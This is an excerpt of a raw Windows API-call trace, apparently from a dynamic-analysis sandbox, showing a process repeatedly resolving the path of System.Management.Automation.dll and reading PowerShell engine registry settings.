	[0496.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.362] GetCurrentProcessId () returned 0xab0
	[0496.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.367] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d758 | out: phkResult=0x24d758*=0x370) returned 0x0
	[0496.367] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d6dc, lpData=0x0, lpcbData=0x24d6d8*=0x0 | out: lpType=0x24d6dc*=0x1, lpData=0x0, lpcbData=0x24d6d8*=0x56) returned 0x0
	[0496.367] CoTaskMemAlloc (cb=0x5a) returned 0x1b922590
	[0496.367] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d6ac, lpData=0x1b922590, lpcbData=0x24d6a8*=0x56 | out: lpType=0x24d6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d6a8*=0x56) returned 0x0
	[0496.367] CoTaskMemFree (pv=0x1b922590) 
	[0496.367] RegCloseKey (hKey=0x370) returned 0x0
	[0496.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.375] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0496.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.375] CoTaskMemFree (pv=0x1b91f1c0) 
	[0496.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
